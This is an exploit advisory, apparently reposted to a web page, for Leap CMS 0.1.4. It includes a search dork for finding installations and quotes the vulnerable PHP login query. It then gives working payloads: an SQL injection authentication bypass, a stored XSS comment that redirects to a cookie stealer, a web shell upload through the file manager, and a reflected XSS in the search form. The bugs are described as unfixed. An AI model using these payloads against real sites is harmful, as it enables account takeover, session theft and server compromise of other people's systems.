15.43.28 MULTIPLE REMOTE VULNERABILITIES--Leap CMS 0.1.4--> | |
------------------------------ MULTIPLE REMOTE VULNERABILITIES--Leap CMS 0.1.4--> ------------------------------ CMS INFORMATION: -->WEB: http://leap.gowondesigns.com/ -->DEMO: http://php.opensourcecms.com/ -->CATEGORY: CMS / Lite -->DESCRIPTION: Leap is a single file, template independent, open-source, standards-compliant,extensible content management system for the web... -->RELEASED: 2009-03-13 CMS VULNERABILITY: -->TESTED ON: firefox 3 and I-Explorer 6 -->DORK: "Powered by Leap" -->CATEGORY: AUTH-BYPASS(SQLi)/COOKIE- -->AFFECT VERSION: 0.1.4 (maybe <= ?) -->Discovered Bug date: 2009-04-24 -->Reported Bug date: 2009-04-24 -->Fixed bug date: Not fixed -->Info patch: Not fixed -->Author: YEnH4ckEr -->mail: y3nh4ck3r[at]gmail[dot]com -->WEB/BLOG: N/A -->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo. -->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!) ############################## ////////////////////////////// AUTHENTICATION BYPASS (SQLi): ///////////////////////////// ############################## <<<<---------++++++++++++++ Condition: magic_quotes_gpc=off +++++++++++++++++--------->>>> ----------- FILE VULN: ----------- Path --> [HOME_PATH]/leap.php function checkSession() { if($_POST['login']=='Login') { $_SESSION['userMail']=$_POST[' .... } $i=@mysql_query("SELECT * FROM ".db('prefix')."users WHERE mail='$_SESSION[userMail]' AND pwd='$_SESSION[passWord]'"); $d=@mysql_fetch_array($i); .... --------- EXPLOIT: --------- Email Address: nothing' or 1=1# Password: nothing ############################# ///////////////////////////// COOKIES STEALING VULN (XSS): ///////////////////////////// ############################# <<<<---------++++++++++++++ Condition: Add comment +++++++++++++++++--------->>>> --------- EXPLOIT: --------- Go to Link --> http://[HOST]/[HOME_PATH]/? There it can comment the article. Add a comment with any name/email and message: <script>document.location= PHP Script (Cookies Stealer) --> See: http://www.milw0rm.com/ http://www.milw0rm.com/ Note: Exploit fails if real admin click on log-out button. ############################ //////////////////////////// SHELL UPLOAD VULNERABILITY: //////////////////////////// ############################ <<<<---------++++++++++++++ Condition: Be superadmin (above) +++++++++++++++++--------->>>> --------- EXPLOIT: --------- Option: Manage Files. Link --> http://[HOST]/[HOME_PATH]/? upload your shell there. Then, Go to the link --> http://[HOST]/[HOME_PATH]/ ######################## //////////////////////// XSS (SEARCH POST FORM): //////////////////////// ######################## Search: "><script>alert(1)</script> ############################## ############################## ##**************************** ## ESPECIAL GREETZ TO: Str0ke, JosS, Ulises2K ... ## ##**************************** ##---------------------------- ##**************************** ## GREETZ TO: SPANISH H4ck3Rs community! ## ##**************************** ############################## ############################## | |
|
Total comments: 0 | |